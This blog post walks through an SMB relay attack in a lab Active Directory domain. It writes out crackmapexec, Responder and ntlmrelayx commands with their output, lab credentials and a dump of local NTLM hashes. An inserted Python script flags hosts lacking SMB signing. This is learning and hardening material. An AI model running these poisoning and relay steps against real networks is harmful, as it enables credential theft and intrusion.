
Sunday, September 12, 2021

Active Directory CORPORATIVE.domain.local Series [III]: SMB Relay attack, dump NTLM hashes

Hi everyone,

So far so good. I hope you have read my last post on the roadtoOSCP blog, Active Directory series [II]. In that post I described the environment architecture that we are going to use during this series of attacks in our local corporate domain.


The complete attack process is defined step by step in the previous image, but not everybody can understand the design without an explanation. The attack idea can be understood from the following high-level, simplified diagram:





Prerequisites:

1. In order to perform this attack successfully, the user pwned in the previous post, Active Directory series [II] (CORPORATIVE\worker2), must be logged on to WKS-002.

2. The pwned user must also have local administrator privileges on WKS-001.

Validate the admin rights:

    crackmapexec smb 10.0.2.0/24 -u "worker2" -p "Passw0rd1"

    SMB         10.0.2.15       445    WKS-001          [*] Windows 10.0 Build 16299 x64 (name:WKS-001) (domain:CORPORATIVE.DOMAIN.local) (signing:False) (SMBv1:False)
    SMB         10.0.2.16       445    WKS-002          [*] Windows 10.0 Build 19041 x64 (name:WKS-002) (domain:CORPORATIVE.DOMAIN.local) (signing:False) (SMBv1:False)
    SMB         10.0.2.17       445    CORPORATIVE-DOM  [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)
    SMB         10.0.2.15       445    WKS-001          [+] CORPORATIVE.DOMAIN.local\worker2:Passw0rd1 (Pwn3d!)
    SMB         10.0.2.16       445    WKS-002          [+] CORPORATIVE.DOMAIN.local\worker2:Passw0rd1
    SMB         10.0.2.17       445    CORPORATIVE-DOM  [+] CORPORATIVE.DOMAIN.local\worker2:Passw0rd1
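As an added example (not code from the original post), the following Python script parses crackmapexec banner lines in the format shown above and reports which hosts advertise signing:False, that is, the hosts that would accept a relayed NTLM authentication and where SMB signing should be required first. The input lines are copied from the scan above; the parser assumes that exact banner layout.

```python
import re
from dataclasses import dataclass
from typing import List

# Banner lines copied from the crackmapexec scan above (constructed sample input for this example).
CME_OUTPUT = """\
SMB         10.0.2.15       445    WKS-001          [*] Windows 10.0 Build 16299 x64 (name:WKS-001) (domain:CORPORATIVE.DOMAIN.local) (signing:False) (SMBv1:False)
SMB         10.0.2.16       445    WKS-002          [*] Windows 10.0 Build 19041 x64 (name:WKS-002) (domain:CORPORATIVE.DOMAIN.local) (signing:False) (SMBv1:False)
SMB         10.0.2.17       445    CORPORATIVE-DOM  [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)
SMB         10.0.2.15       445    WKS-001          [+] CORPORATIVE.DOMAIN.local\\worker2:Passw0rd1 (Pwn3d!)
"""

# A "[*]" banner line: protocol, IP, port, hostname, OS string, then the (key:value) fields.
BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+\d+\s+(?P<host>\S+)\s+\[\*\]\s+"
    r"(?P<os>.*?)\s+\(name:[^)]*\)\s+\(domain:(?P<domain>[^)]*)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)

@dataclass
class SmbHost:
    ip: str
    host: str
    os: str
    domain: str
    signing: bool   # True when the host requires SMB signing
    smbv1: bool     # True when SMBv1 is still enabled

def parse_cme(output: str) -> List[SmbHost]:
    """One SmbHost per banner line; "[+]" authentication-result lines are skipped."""
    hosts = []
    for line in output.splitlines():
        m = BANNER_RE.match(line)
        if m:
            hosts.append(SmbHost(m["ip"], m["host"], m["os"], m["domain"],
                                 m["signing"] == "True", m["smbv1"] == "True"))
    return hosts

def relay_exposed(hosts: List[SmbHost]) -> List[str]:
    """Hosts not requiring SMB signing: relayed NTLM auth is accepted there, so enforce signing first."""
    return [h.host for h in hosts if not h.signing]

def smbv1_enabled(hosts: List[SmbHost]) -> List[str]:
    """Hosts still accepting SMBv1, the second hardening gap the scan banner reveals."""
    return [h.host for h in hosts if h.smbv1]

if __name__ == "__main__":
    parsed = parse_cme(CME_OUTPUT)
    print("signing not required:", relay_exposed(parsed), "| SMBv1 enabled:", smbv1_enabled(parsed))
```

In this lab only the domain controller requires signing, which is why the two workstations are the hosts the rest of the post can target.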



ATTACK DEVELOPMENT, STEP 1:

SMB relay over NTLM:

1. The user worker2, logged on WKS-002, tries to access a shared resource.

2. The attacker machine poisons the response to this request and redirects the victim to authenticate against ntlmrelayx running on the attacker machine.

3. After this authentication the attacker can obtain the NTLM hashes stored locally on WKS-002.


Prepare the attacker machine:

Responder.py with its SMB and HTTP servers disabled:

    sudo python3 Responder.py -I eth0 -rdw




ntlmrelayx on the attacker machine, receiving the SMB authentication and relaying it to the hosts in targets.txt:

    kali@kali:~$ sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf targets.txt -smb2support
    Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

    [*] Protocol Client SMTP loaded..
    [*] Protocol Client HTTP loaded..
    [*] Protocol Client HTTPS loaded..
    [*] Protocol Client LDAP loaded..
    [*] Protocol Client LDAPS loaded..
    [*] Protocol Client IMAP loaded..
    [*] Protocol Client IMAPS loaded..
    [*] Protocol Client MSSQL loaded..
    [*] Protocol Client SMB loaded..
    [*] Running in relay mode to hosts in targetfile
    [*] Setting up SMB Server
    [*] Setting up HTTP Server


Perform the attack and obtain the NTLM hash dump:

The user worker2 on WKS-002 tries to access a shared directory that does not exist or is unavailable:



Now our Responder listens and poisons the response to this request; in that response the victim server (WKS-002) is redirected to ntlmrelayx for the authentication process:




Dump the hashes:




NTLM hashes:

    Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a594f883e7a118ead15dccd70ae3c73f:::
    f0ns1:1001:aad3b435b51404eeaad3b435b51404ee:5858d47a41e40b40f294b3100bea611f:::




And this is all for this Active Directory attack. I hope you enjoyed my third Windows entry and that you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.

With kind regards, f0ns1




